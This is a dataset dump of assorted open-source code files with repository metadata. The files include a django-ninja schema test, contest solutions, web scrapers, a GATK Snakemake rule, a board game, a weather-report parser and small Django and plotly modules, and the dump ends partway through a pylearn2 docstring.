| blob_id (string, len 40) | directory_id (string, len 40) | path (string, len 3–288) | content_id (string, len 40) | detected_licenses (list, len 0–112) | license_type (2 classes) | repo_name (string, len 5–115) | snapshot_id (string, len 40) | revision_id (string, len 40) | branch_name (684 classes) | visit_date (timestamp[us], 2015-08-06 10:31:46 – 2023-09-06 10:44:38) | revision_date (timestamp[us], 1970-01-01 02:38:32 – 2037-05-03 13:00:00) | committer_date (timestamp[us], 1970-01-01 02:38:32 – 2023-09-06 01:08:06) | github_id (int64, 4.92k – 681M, nullable) | star_events_count (int64, 0 – 209k) | fork_events_count (int64, 0 – 110k) | gha_license_id (22 classes) | gha_event_created_at (timestamp[us], 2012-06-04 01:52:49 – 2023-09-14 21:59:50, nullable) | gha_created_at (timestamp[us], 2008-05-22 07:58:19 – 2023-08-21 12:35:19, nullable) | gha_language (147 classes) | src_encoding (25 classes) | language (1 class) | is_vendor (bool, 2 classes) | is_generated (bool, 2 classes) | length_bytes (int64, 128 – 12.7k) | extension (142 classes) | content (string, len 128–8.19k) | authors (list, len 1) | author_id (string, len 1–132) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e3b04d3b778413a7f94a95da22d271e008cd9655
|
02a0fff2786e5c24eb3f5aa505475705bf460196
|
/tests/test_openapi_schema.py
|
914f84912e37c7b5fb5c2630232f6b138132a2e5
|
[
"MIT"
] |
permissive
|
ismohamedi/django-ninja
|
5b63b0d45c0b22a36996e97f82fa289e91ccdffb
|
774f7f2af536dbedf527376f1ed6724b2456a54f
|
refs/heads/master
| 2023-03-12T22:30:16.991598
| 2021-02-19T14:55:30
| 2021-02-19T14:55:30
| 341,249,874
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,295
|
py
|
from typing import List
from unittest.mock import patch
from ninja import NinjaAPI, Schema
from django.test import Client, override_settings
from copy import copy
api = NinjaAPI()
class Payload(Schema):
i: int
f: float
class Response(Schema):
i: int
f: float
@api.post("/test", response=Response)
def method(request, data: Payload):
return data.dict()
@api.post("/test_list", response=List[Response])
def method_list(request, data: List[Payload]):
return []
def test_schema_views(client: Client):
assert client.get("/api/").status_code == 404
assert client.get("/api/docs").status_code == 200
assert client.get("/api/openapi.json").status_code == 200
def test_schema_views_no_INSTALLED_APPS(client: Client):
"Making sure that cdn and included js works fine"
from django.conf import settings
# removing ninja from settings:
INSTALLED_APPS = [i for i in settings.INSTALLED_APPS if i != "ninja"]
@override_settings(INSTALLED_APPS=INSTALLED_APPS)
def call_docs():
assert client.get("/api/docs").status_code == 200
call_docs()
def test_schema():
schema = api.get_openapi_schema()
from pprint import pprint
# --------------------------------------------------------------
method = schema["paths"]["/api/test"]["post"]
assert method["requestBody"] == {
"content": {
"application/json": {"schema": {"$ref": "#/components/schemas/Payload"}}
},
"required": True,
}
assert method["responses"] == {
200: {
"content": {
"application/json": {
"schema": {"$ref": "#/components/schemas/Response"}
}
},
"description": "OK",
}
}
# --------------------------------------------------------------
method_list = schema["paths"]["/api/test_list"]["post"]
assert method_list["requestBody"] == {
"content": {
"application/json": {
"schema": {
"items": {"$ref": "#/components/schemas/Payload"},
"title": "Data",
"type": "array",
}
}
},
"required": True,
}
assert method_list["responses"] == {
200: {
"content": {
"application/json": {
"schema": {
"items": {"$ref": "#/components/schemas/Response"},
"title": "Response",
"type": "array",
}
}
},
"description": "OK",
}
}
assert schema["components"]["schemas"] == {
"Payload": {
"properties": {
"f": {"title": "F", "type": "number"},
"i": {"title": "I", "type": "integer"},
},
"required": ["i", "f"],
"title": "Payload",
"type": "object",
},
"Response": {
"properties": {
"f": {"title": "F", "type": "number"},
"i": {"title": "I", "type": "integer"},
},
"required": ["i", "f"],
"title": "Response",
"type": "object",
},
}
|
[
"ppr.vitaly@gmail.com"
] |
ppr.vitaly@gmail.com
|
88d46720752a93211916300c547dbdb1f076b09f
|
0bb474290e13814c2498c086780da5096453da05
|
/diverta2019/A/main.py
|
9d653fcacf100b95d6cac66ff44625485aa86670
|
[] |
no_license
|
ddtkra/atcoder
|
49b6205bf1bf6a50106b4ae94d2206a324f278e0
|
eb57c144b5c2dbdd4abc432ecd8b1b3386244e30
|
refs/heads/master
| 2022-01-25T15:38:10.415959
| 2020-03-18T09:22:08
| 2020-03-18T09:22:08
| 208,825,724
| 1
| 0
| null | 2022-01-21T20:10:20
| 2019-09-16T14:51:01
|
Python
|
UTF-8
|
Python
| false
| false
| 560
|
py
|
#!/usr/bin/env python3
import sys
def solve(N: int, K: int):
print(N-(K-1))
return
# Generated by 1.1.4 https://github.com/kyuridenamida/atcoder-tools (tips: You use the default template now. You can remove this line by using your custom template)
def main():
def iterate_tokens():
for line in sys.stdin:
for word in line.split():
yield word
tokens = iterate_tokens()
N = int(next(tokens)) # type: int
K = int(next(tokens)) # type: int
solve(N, K)
if __name__ == '__main__':
main()
|
[
"deritefully@gmail.com"
] |
deritefully@gmail.com
|
08787715e5c39a2256e078d7d66ba33fc723d3cb
|
b2b9cd537c4c6a216d9b1ee32008cc8e98552405
|
/Oriented_crawler/simple_thread/needheader.py
|
b7e1afc46eb45b39712ffaf80679f9f2e63e5943
|
[] |
no_license
|
liyanfeng0127/python2_bdrw
|
ce982813645294b884d73cd2bbc4de5a33fa2cd5
|
52eba0d67d30ed5ce23e01dde69db35a8ed65787
|
refs/heads/master
| 2021-05-08T06:50:53.916210
| 2017-10-12T10:41:05
| 2017-10-12T10:41:05
| 106,676,637
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 960
|
py
|
# -*- coding: utf-8 -*-
import requests
import re
# The next three lines handle encoding conversion; no need to worry about them for now.
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
# hea is a dictionary we build ourselves that stores the User-Agent
# In the page, right-click "Inspect Element", refresh and open "Network", pick any entry on the left, then select "Headers" and find 'User-Agent'
hea = {'User-Agent':'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36'}
# html = requests.get('http://jp.tingroom.com/yuedu/yd300p/')
html = requests.get('http://jp.tingroom.com/yuedu/yd300p/',headers = hea)
html.encoding = 'utf-8' # convert the encoding to utf-8, otherwise the Chinese text is displayed garbled
# print html.text
# title = re.findall('color:#666666;">(.*?)</span>',html.text,re.S)
# for each in title:
# print each
#
chinese = re.findall('color: #039;">(.*?)</a>',html.text,re.S)
for each in chinese:
print each
|
[
"yanfeng.li@lejent.com"
] |
yanfeng.li@lejent.com
|
c273bf8f309abad0d41156555a5b0f898dfb8ff1
|
6bf492920985e3741440ba53e1c7f8426b66ac1f
|
/snakemake_rules/rules/gatk/gatk_variant_indel_JEXL_filtration.smk
|
1bcc6f56005ae9290a2133ced08430e36f8d7e21
|
[
"MIT"
] |
permissive
|
ukaraoz/snakemake-rules
|
5b2ba7c9ec19d88b56067a46f66fd0c72e48c368
|
07e96afeb39307cdf35ecc8482dc1f8b62c120b9
|
refs/heads/master
| 2020-03-31T15:20:44.444006
| 2018-09-07T08:53:47
| 2018-09-07T08:53:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,512
|
smk
|
# -*- snakemake -*-
include: 'gatk.settings.smk'
include: 'gatk_select_indel_variants.smk'
config_default = {'gatk' :{'variant_indel_JEXL_filtration' : _gatk_config_rule_default.copy()}}
config_default['gatk']['variant_indel_JEXL_filtration'].update(
{
'expressions':
["QD < 2.0", "ReadPosRankSum < -20.0", "FS > 200.0",
"SOR > 10.0"]
})
update_config(config_default, config)
config = config_default
rule gatk_variant_indel_JEXL_filtration:
"""Run GATK VariantFiltration
Perform hard filtering using JEXL expressions
"""
wildcard_constraints:
suffix = "(.vcf|.vcf.gz)"
params: cmd = config['gatk']['cmd'] + " -T " + VARIANT_FILTRATION,
options = " ".join([
" ".join(["--filterName GATKStandard{e} --filterExpression \"{exp}\"".format(e=exp.split()[0], exp=exp) \
for exp in config['gatk']['variant_indel_JEXL_filtration']['expressions']])
]),
quote = "" if config['gatk']['cmd'].startswith("gatk") else "",
runtime = config['gatk']['variant_indel_JEXL_filtration']['runtime']
input: vcf = "{prefix}{suffix}", ref = config['gatk']['variant_indel_JEXL_filtration']['ref']
output: vcf = "{prefix}.filteredINDEL{suffix}"
threads: config['gatk']['variant_indel_JEXL_filtration']['threads']
conda: "env.yaml"
shell: "{params.cmd} {params.quote}{params.options}{params.quote} -R {input.ref} --variant {input.vcf} --out {output.vcf}"
|
[
"per.unneberg@scilifelab.se"
] |
per.unneberg@scilifelab.se
|
fb291cab56eb80122ba5cbe060bfae906dc43ad0
|
6baac3bec174cbb3542d844b34cec3870633e7bf
|
/red_blue.py
|
f1ecc21136b6b888b03b5d416a9b4635190f2a47
|
[] |
no_license
|
tyday/RedBlue
|
abcbdbe65fe13ae468cffaf7d9b1b5b1aba34a0f
|
4e54d3e4ca67981cc32ba659ec8f0b5aed93b291
|
refs/heads/main
| 2023-01-07T19:26:40.147228
| 2020-11-07T01:32:50
| 2020-11-07T01:32:50
| 310,451,484
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,067
|
py
|
# a program to play red vs blue
# It's played on a board. Each side gets to choose an open
# square per side. Selecting a square turns each adjacent square
# your color. The game ends when all squares are filled.
# the winner is the side with the most squares
# created from this idea
# https://red-blue.herokuapp.com/
# https://github.com/akulchhillar/Red-Blue
# https://www.reddit.com/r/flask/comments/jkdxh0/hi_all_here_is_a_board_game_for_two_players_made/
# Flow:
# Display Status
# Wait for turn
# Evaluate/Update Board
# Check for win
# Save Game
from random import choice
from enum import Enum
class Cell_Value(Enum):
RED = -1
BLUE = 1
NEUTRAL = 0
class Red_Blue():
def __init__(self, width = 8, height = 8,
display_status = True,
red_player = 'human',
blue_player = 'human'):
player_type = {
'human': self.get_human_move,
'random': self.get_random_computer_move
}
self.board_width = 8
self.board = [Cell_Value.NEUTRAL] * width * height
self.game_over = False
self.player = {
Cell_Value.BLUE: player_type[blue_player],
Cell_Value.RED: player_type[red_player]
}
# self.red_player = red_player
# self.blue_player = blue_player
self.display_status = display_status
self.history = []
self.turn = Cell_Value.RED
def get_available_moves(self):
available_moves = []
for i in range(len(self.board)):
if self.board[i].name == 'NEUTRAL':
available_moves.append(i)
return available_moves
def get_random_move(self):
available_moves = self.get_available_moves()
random_selection = choice(available_moves)
return random_selection
def check_if_move_is_valid(self,move):
if int(move) in self.get_available_moves():
return True
return False
def get_adjacent_cells(self, cell):
adjacent_cells = []
# Above
if cell - self.board_width >= 0:
adjacent_cells.append(cell-self.board_width)
# Below
if cell + self.board_width < len(self.board):
adjacent_cells.append(cell+self.board_width)
# Left
if cell % self.board_width != 0:
adjacent_cells.append(cell-1)
# Right
if (cell+1)%self.board_width !=0:
adjacent_cells.append(cell+1)
return adjacent_cells
def get_center_cell(self, data):
# used if we only get the data of cells flipped
# but not selected cell
for cell in data:
cell_adjacents = self.get_adjacent_cells(cell)
cell_overlap = [c for c in cell_adjacents if c in data]
if len(cell_overlap) > 1:
return cell
return None
def player_action(self):
self.player[self.turn]()
def get_human_move(self):
move = None
while move not in self.get_available_moves():
move = input("Select cell: ")
if move == 'q':
break
try:
move = int(move)
except:
print('Selection must be an integer.')
if move not in self.get_available_moves():
print('Invalid move... please select again')
self.move(move)
def get_random_computer_move(self):
move = self.get_random_move()
self.move(move)
def change_player(self):
if self.turn == Cell_Value.RED:
self.turn = Cell_Value.BLUE
else:
self.turn = Cell_Value.RED
def show_status(self):
r,b = self.red_blue_score()
print(f'Turn: {self.turn.name} -- Score RED: {r}, BLUE: {b}')
def show_board(self):
row = ''
for i, cell in enumerate(self.board):
if cell == Cell_Value.RED:
row += ' RR '
elif cell == Cell_Value.BLUE:
row += ' BB '
else:
row += f' {i:2d} '
if (i+1) % self.board_width == 0:
# we've reached the end of the row.
print(row)
print()
row = ''
def move(self, move):
all_cells = self.get_adjacent_cells(move)
all_cells.append(move)
for cell in all_cells:
self.board[cell] = self.turn
board = [cell.value for cell in self.board]
self.history.append([self.turn.value, move, board])
def red_blue_score(self):
red = len([cell for cell in self.board if cell.name == Cell_Value.RED.name])
blue = len([cell for cell in self.board if cell.name == Cell_Value.BLUE.name])
return red, blue
def check_game_status(self):
if len(self.get_available_moves()) == 0:
# game is over,
# so append the winner of the game to the game history
self.game_over = True
print('Winner!!!')
red_cells = [cell for cell in self.board if cell.name == Cell_Value.RED.name]
blue_cells = [cell for cell in self.board if cell.name == Cell_Value.BLUE.name]
winner = 0
if len(red_cells) > len(blue_cells):
winner = Cell_Value.RED.value
elif len(blue_cells) > len(red_cells):
winner = Cell_Value.BLUE.value
else:
winner = Cell_Value.NEUTRAL.value
for item in self.history:
item.insert(0,winner)
def play_game(self):
while self.game_over is False:
if self.display_status:
self.show_status()
self.show_board()
self.player_action()
self.change_player()
self.check_game_status()
print(self.history)
print(self.show_status())
if __name__=='__main__':
game = Red_Blue(display_status=False, red_player='random', blue_player='random')
game.play_game()
|
[
"tyrday@gmail.com"
] |
tyrday@gmail.com
|
c8a08a597f157e4b39c207a5d7d93895a325beea
|
d93fe0484fc3b32c8fd9b33cc66cfd636a148ec4
|
/AtCoder/ARC-C/004probC.py
|
2dc3017bd13cc5dfe8e5d05bb87bb841727be9e2
|
[] |
no_license
|
wattaihei/ProgrammingContest
|
0d34f42f60fa6693e04c933c978527ffaddceda7
|
c26de8d42790651aaee56df0956e0b206d1cceb4
|
refs/heads/master
| 2023-04-22T19:43:43.394907
| 2021-05-02T13:05:21
| 2021-05-02T13:05:21
| 264,400,706
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 435
|
py
|
import sys
input = sys.stdin.readline
from fractions import gcd
X, Y = map(int, input().split("/"))
g = gcd(X, Y)
x = X//g
y = Y//g
n_min = (2*x-y)//(y**2)
n_max = (2*x+y)//(y**2) + 1
ans = []
for n in range(n_min, n_max+1):
if n <= 0: continue
N = y*n
M = N*(N+1)//2 - x*n
if 0 < M <= N:
ans.append((N, M))
if not ans:
print("Impossible")
else:
print("\n".join([str(a)+" "+str(b) for a, b in ans]))
|
[
"wattaihei.rapyuta@gmail.com"
] |
wattaihei.rapyuta@gmail.com
|
16fe148351f93eee112d2d7bab5ba1c951af710b
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/ncLp4ZXvz4x4oEHYh_13.py
|
08497f878c8c64402f937ecba818958c517619e3
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264
| 2021-03-23T16:08:01
| 2021-03-23T16:08:01
| 350,773,815
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 674
|
py
|
"""
Given two unique integer lists `a` and `b`, and an integer target value `v`,
create a function to determine whether there is a pair of numbers that add up
to the target value `v`, where one number comes from one list `a` and the
other comes from the second list `b`.
Return `True` if there is a pair that adds up to the target value and `False`
otherwise.
### Examples
sum_of_two([1, 2], [4, 5, 6], 5) ➞ True
sum_of_two([1, 2], [4, 5, 6], 8) ➞ True
sum_of_two([1, 2], [4, 5, 6], 3) ➞ False
sum_of_two([1, 2], [4, 5, 6], 9) ➞ False
### Notes
N/A
"""
def sum_of_two(a, b, v):
return any([i+j==v for i in a for j in b])
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
21326e3552bdb8a7d4600a442d82b4a5930e105e
|
5dcdc5720f59280e6e22e78534dc565e9b299048
|
/数学/Angles of a Clock.py
|
6883e79b5bbaa586ecf7db879518fbfeaa58e64d
|
[] |
no_license
|
Stella2019/10-24
|
4fc944ba397d8f9494f4fc7ceead3065b4572a55
|
d62572831235e8e608f259aa7b3608ae6752a64a
|
refs/heads/main
| 2023-01-01T12:46:06.021044
| 2020-10-24T20:53:12
| 2020-10-24T20:53:12
| 306,967,300
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 232
|
py
|
def calcAngle(h, m):
hour_angle = (360 / (12 * 60.0)) * (h * 60 + m)
min_angle = 360 / 60.0 * m
angle = abs(hour_angle - min_angle)
return min(angle, 360 - angle)
print(calcAngle(3, 15))
# 7.50
print(calcAngle(3, 00))
# 90
|
[
"noreply@github.com"
] |
Stella2019.noreply@github.com
|
b82cce8fe7e0e430c2cb38d742aab8c0b680be5f
|
a46d135ba8fd7bd40f0b7d7a96c72be446025719
|
/packages/python/plotly/plotly/validators/bar/_yperiod0.py
|
225b424a1703b373d93e4772e32dd4b730f629cb
|
[
"MIT"
] |
permissive
|
hugovk/plotly.py
|
5e763fe96f225d964c4fcd1dea79dbefa50b4692
|
cfad7862594b35965c0e000813bd7805e8494a5b
|
refs/heads/master
| 2022-05-10T12:17:38.797994
| 2021-12-21T03:49:19
| 2021-12-21T03:49:19
| 234,146,634
| 0
| 0
|
MIT
| 2020-01-15T18:33:43
| 2020-01-15T18:33:41
| null |
UTF-8
|
Python
| false
| false
| 392
|
py
|
import _plotly_utils.basevalidators
class Yperiod0Validator(_plotly_utils.basevalidators.AnyValidator):
def __init__(self, plotly_name="yperiod0", parent_name="bar", **kwargs):
super(Yperiod0Validator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "calc"),
**kwargs
)
|
[
"nicolas@plot.ly"
] |
nicolas@plot.ly
|
6eeba5437fbc07d0f6fd5a93ffba6c90b5d28a83
|
1751ea577fb63c0e34e469193c0de0519fa5d32b
|
/manage.py
|
43213755618f352dfdc6090a6f0056cb9895fc95
|
[] |
no_license
|
zakuro9715/uragf
|
a987f0ae51c15496e48214eaffc5440a1dbc641e
|
060658d2dc5a5a15bdd5f2301a60d050b38ddf3d
|
refs/heads/master
| 2021-01-10T00:57:47.417420
| 2016-04-03T05:26:13
| 2016-04-03T05:26:13
| 36,533,479
| 0
| 2
| null | 2015-06-23T23:30:42
| 2015-05-29T23:01:38
|
Python
|
UTF-8
|
Python
| false
| false
| 248
|
py
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "uragf.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
[
"zakuro@yuzakuro.me"
] |
zakuro@yuzakuro.me
|
522c6512806730f37abd8e337751cf53e361a3fb
|
0566cf76b456518875edecece15e763a36a4795f
|
/scrapers/1channelmovie_com.py
|
9fdd83bce3433ea161b1b921f96d70c7f22a427f
|
[] |
no_license
|
theclonedude/Scraping_BeautifulSoup_phantomjs
|
684b1f7a993e0d2555daa7a5455cf19bd29b0b1b
|
faf653feae46c21a72d13b2123cdebdb2f7c05d8
|
refs/heads/master
| 2023-03-16T19:36:14.867361
| 2018-06-14T14:21:02
| 2018-06-14T14:21:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,172
|
py
|
import re
from sandcrawler.scraper import ScraperBase, SimpleScraperBase, ScraperFetchException
class OneChannelMovieCom(SimpleScraperBase):
BASE_URL = 'http://www.1channelmovie.com'
OTHERS_URLS = ['http://1channelmovie.com', 'http://www.1channelmovie.com']
# it seems we can merge this with PrimewireAg scraper
def setup(self):
self.register_scraper_type(ScraperBase.SCRAPER_TYPE_OSP)
self.search_term_language = "eng"
self.register_media(ScraperBase.MEDIA_TYPE_TV)
self.register_media(ScraperBase.MEDIA_TYPE_FILM)
self.register_url(
ScraperBase.URL_TYPE_SEARCH,
self.BASE_URL,
)
self.register_url(
ScraperBase.URL_TYPE_LISTING,
self.BASE_URL)
def _fetch_next_button(self, soup):
link = soup.select_one('div.pagination a[rel="next"]')
if link:
return link.href
else:
return None
def _get_search_url(self, search_term, media_type):
return self.BASE_URL + '/search/%s/' % \
self.util.quote(search_term)
def search(self, search_term, media_type, **extra):
search_url = self._get_search_url(search_term, media_type)
for soup in self.soup_each([search_url]):
self._parse_search_page(soup)
def _parse_search_page(self, soup):
results = soup.select('div.index_item a')
if not results or len(results) == 0:
return self.submit_search_no_results()
for link in results:
# Skip extra, not useful links.
if re.match('Watch (.*) for FREE', link['title']):
continue
self.submit_search_result(
link_url=link['href'],
link_title=link['title']
)
next_button = self._fetch_next_button(soup)
if next_button and self.can_fetch_next():
soup = self.get_soup(next_button)
self._parse_search_page(soup)
def parse(self, parse_url, **extra):
for soup in self.soup_each([parse_url, ]):
# Movie pages have the versions linked directly off the main page.
self._parse_versionlinks(soup)
# TV you need to go a page deep (ie each episode)
for link in soup.select('div.tv_episode_item a'):
try:
episode_soup = self.get_soup(link['href'])
self._parse_versionlinks(episode_soup)
except Exception as e:
self.log.exception(e)
def _parse_versionlinks(self, soup):
for link in soup.select('span.movie_version_link a'):
# Follow the link to get the 'real' url.
url = link['href']
if 'marketing' in url:
continue
if not url.startswith('http'):
url = self.BASE_URL + url
try:
followed_link = self.get(url)
except Exception:
self.log.warning('Failed to follow link.')
else:
self.submit_parse_result(index_page_title=soup.title.text.strip(),
link_url=followed_link.url,
link_name=link['title']
)
class VodlyTo(OneChannelMovieCom):
BASE_URL = 'http://vodly.cr'
OTHER_URLS = ['http://vodly.to', ]
SINGLE_RESULTS_PAGE = True
#def setup(self):
# raise NotImplementedError('The website is with "Be right back" message on the front page')
def get(self, url, **kwargs):
return super(self.__class__, self).get(
url, allowed_errors_codes=[404, 403], **kwargs)
def _get_search_url(self, search_term, media_type):
return self.BASE_URL + '/movies/filter?genre=&year=&actor={}&director=&submit='.format(search_term)
def _parse_search_page(self, soup):
info_box = soup.select_one('h3[class="comment-reply-title"]')
if info_box and info_box.text.find("No movies were found based on the above search") > -1:
return self.submit_search_no_results()
found = 0
for link in soup.select('div.item-img a'):
if link:
self.submit_search_result(
link_url=link.href,
link_title=link.text,
image=self.util.find_image_src_or_none(link, 'img')
)
found = 1
if found == 0:
self.submit_search_no_results()
def _follow_link(self, link):
soup = self.get_soup(link)
result = soup.select_one('div.video-section a')
return result and result.href or None
def parse(self, parse_url, **extra):
for soup in self.soup_each([parse_url, ]):
title = soup.select_one('h1').text
for link in soup.select('a.external_link'):
url = self._follow_link(link.href)
if url:
self.submit_parse_result(
link_url=url,
link_title=title,
)
|
[
"stryokka@gmail.com"
] |
stryokka@gmail.com
|
fa5e3a6fc50b302b03a1dc690503f0ab53d00c0e
|
bb45e66a1b438cb9bb8eb2cdcd54d82287338fdf
|
/pyiem/nws/products/lsr.py
|
b4e889ea5e7190bcf1cbdd8fe991683969be9c86
|
[] |
no_license
|
aarande/pyIEM
|
685c50b6af3e2cc936e434d7152e67f4ffc1e0ed
|
e9467710e6908ca147ebe88c2ee3559484503fe2
|
refs/heads/master
| 2021-01-21T00:02:22.123066
| 2015-02-27T15:27:45
| 2015-02-27T15:27:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,383
|
py
|
'''
Local Storm Report
'''
# Standard Library Imports
import datetime
import re
# Third party
import pytz
from shapely.geometry import Point as ShapelyPoint
SPLITTER = re.compile(r"(^[0-9].+?\n^[0-9].+?\n)((?:.*?\n)+?)(?=^[0-9]|$)",
re.MULTILINE)
from pyiem.nws.product import TextProduct, TextProductException
from pyiem import reference
from pyiem.nws.lsr import LSR
class LSRProductException(TextProductException):
''' Something we can raise when bad things happen! '''
pass
class LSRProduct(TextProduct):
''' Represents a text product of the LSR variety '''
def __init__(self, text, utcnow=None):
''' constructor '''
self.lsrs = []
self.duplicates = 0
TextProduct.__init__(self, text, utcnow=utcnow)
def get_temporal_domain(self):
''' Return the min and max timestamps of lsrs '''
valids = []
for lsr in self.lsrs:
valids.append( lsr.valid )
if len(valids) == 0:
return None, None
return min(valids), max(valids)
def is_summary(self):
''' Return whether this LSR is a summary or not '''
return self.unixtext.find("...SUMMARY") > 0
def get_url(self, baseuri):
''' Get the URL of this product '''
min_time, max_time = self.get_temporal_domain()
wfo = self.source[1:]
return "%s#%s/%s/%s" % (baseuri, wfo,
min_time.strftime("%Y%m%d%H%M"),
max_time.strftime("%Y%m%d%H%M") )
def get_jabbers(self, uri):
''' return a text and html variant for Jabber stuff '''
res = []
wfo = self.source[1:]
url = self.get_url(uri)
for mylsr in self.lsrs:
if mylsr.duplicate:
continue
time_fmt = "%-I:%M %p %Z"
url = "%s#%s/%s/%s" % (uri, mylsr.wfo,
mylsr.utcvalid.strftime("%Y%m%d%H%M"),
mylsr.utcvalid.strftime("%Y%m%d%H%M") )
if mylsr.valid.day != self.utcnow.day:
time_fmt = "%-d %b, %-I:%M %p %Z"
xtra = {
'product_id': self.get_product_id(),
'channels': "LSR%s,LSR.ALL,LSR.%s" % (mylsr.wfo,
mylsr.typetext.replace(" ", "_")),
'geometry': 'POINT(%s %s)' % (mylsr.get_lon(), mylsr.get_lat()),
'ptype' : mylsr.get_dbtype(),
'valid' : mylsr.utcvalid.strftime("%Y%m%dT%H:%M:00"),
'category' : 'LSR',
'twitter' : "%s %s" % (mylsr.tweet(), url),
'lat': str(mylsr.get_lat()),
'long': str(mylsr.get_lon()),
}
html = ("<p>%s [%s Co, %s] %s <a href=\"%s\">reports %s</a> at "
+"%s -- %s</p>") % (
_mylowercase(mylsr.city), mylsr.county.title(), mylsr.state, mylsr.source,
url, mylsr.mag_string(),
mylsr.valid.strftime(time_fmt), mylsr.remark)
plain = "%s [%s Co, %s] %s reports %s at %s -- %s %s" % (
_mylowercase(mylsr.city), mylsr.county.title(),
mylsr.state, mylsr.source,
mylsr.mag_string(),
mylsr.valid.strftime(time_fmt), mylsr.remark, url)
res.append( [plain, html, xtra])
if self.is_summary():
extra_text = ""
if self.duplicates > 0:
extra_text = (", %s out of %s reports were previously "
+"sent and not repeated here.") % (self.duplicates,
len(self.lsrs))
text = "%s: %s issues Summary Local Storm Report %s %s" % (
wfo, wfo, extra_text, url)
html = ("<p>%s issues "
+"<a href='%s'>Summary Local Storm Report</a>%s</p>") % (
wfo, url, extra_text)
xtra = {
'product_id': self.get_product_id(),
'channels': 'LSR%s' % (wfo,),
}
res.append([text, html, xtra] )
return res
def _mylowercase(text):
''' Specialized lowercase function '''
tokens = text.split()
for i,t in enumerate(tokens):
if len(t) > 3:
tokens[i] = t.title()
elif t in ['N', 'NNE', 'NNW', 'NE',
'E', 'ENE', 'ESE', 'SE',
'S', 'SSE', 'SSW', 'SW',
'W', 'WSW', 'WNW', 'NW']:
continue
return " ".join(tokens)
def parse_lsr(text):
''' Emit a LSR object based on this text!
0914 PM HAIL SHAW 33.60N 90.77W
04/29/2005 1.00 INCH BOLIVAR MS EMERGENCY MNGR
'''
lines = text.split("\n")
if len(lines) < 2:
raise LSRProductException("LSR text is too short |%s|" % (
text.replace("\n", "<NL>"),))
lsr = LSR()
lsr.text = text
tokens = lines[0].split()
h12 = tokens[0][:-2]
mm = tokens[0][-2:]
ampm = tokens[1]
dstr = "%s:%s %s %s" % (h12, mm, ampm, lines[1][:10])
lsr.valid = datetime.datetime.strptime(dstr, "%I:%M %p %m/%d/%Y")
lsr.typetext = lines[0][12:29].strip().upper()
lsr.city = lines[0][29:53].strip()
tokens = lines[0][53:].strip().split()
lat = float(tokens[0][:-1])
lon = 0 - float(tokens[1][:-1])
lsr.geometry = ShapelyPoint((lon,lat))
lsr.consume_magnitude( lines[1][12:29].strip() )
lsr.county = lines[1][29:48].strip()
lsr.state = lines[1][48:50]
lsr.source = lines[1][53:].strip()
if len(lines) > 2:
meat = " ".join( lines[2:] ).strip()
lsr.remark = " ".join( meat.split())
return lsr
def parser(text, utcnow=None, ugc_provider=None, nwsli_provider=None):
''' Helper function that actually converts the raw text and emits an
LSRProduct instance or returns an exception'''
prod = LSRProduct(text, utcnow)
for match in SPLITTER.finditer(prod.unixtext):
lsr = parse_lsr("".join(match.groups()))
lsr.wfo = prod.source[1:]
lsr.assign_timezone( prod.tz, prod.z )
prod.lsrs.append( lsr )
return prod
|
[
"akrherz@iastate.edu"
] |
akrherz@iastate.edu
|
8083e994eaa7d834c3bfa85f4db0f2406e2291d2
|
709bd5f2ecc69a340da85f6aed67af4d0603177e
|
/saleor/account/backends/google.py
|
6c8e205b957de89d66aa8f067b3271926f386c40
|
[
"BSD-3-Clause"
] |
permissive
|
Kenstogram/opensale
|
41c869ee004d195bd191a1a28bf582cc6fbb3c00
|
5102f461fa90f2eeb13b9a0a94ef9cb86bd3a3ba
|
refs/heads/master
| 2022-12-15T02:48:48.810025
| 2020-03-10T02:55:10
| 2020-03-10T02:55:10
| 163,656,395
| 8
| 0
|
BSD-3-Clause
| 2022-12-08T01:31:09
| 2018-12-31T09:30:41
|
Python
|
UTF-8
|
Python
| false
| false
| 222
|
py
|
from social_core.backends.google import GoogleOAuth2
from . import BaseBackend
from ...site import AuthenticationBackends
class CustomGoogleOAuth2(BaseBackend, GoogleOAuth2):
DB_NAME = AuthenticationBackends.GOOGLE
|
[
"Kenstogram@gmail.com"
] |
Kenstogram@gmail.com
|
56c555025b131f114b3d96bcf46ab5d8b4e5c909
|
4252102a1946b2ba06d3fa914891ec7f73570287
|
/pylearn2/scripts/jobman/tester.py
|
6c7685167c84cb7e7757a0b616da9bcc0868a95a
|
[] |
no_license
|
lpigou/chalearn2014
|
21d487f314c4836dd1631943e20f7ab908226771
|
73b99cdbdb609fecff3cf85e500c1f1bfd589930
|
refs/heads/master
| 2020-05-17T00:08:11.764642
| 2014-09-24T14:42:00
| 2014-09-24T14:42:00
| 24,418,815
| 2
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,032
|
py
|
"""
This is an example script that inserts pylearn2 yaml code into a jobman database.
The code below defines a yaml template string in state.yaml_template
and the values of its hyper-parameters in state.hyper_parameters, and
runs the code located in state.extract_results on this model
using jobman.
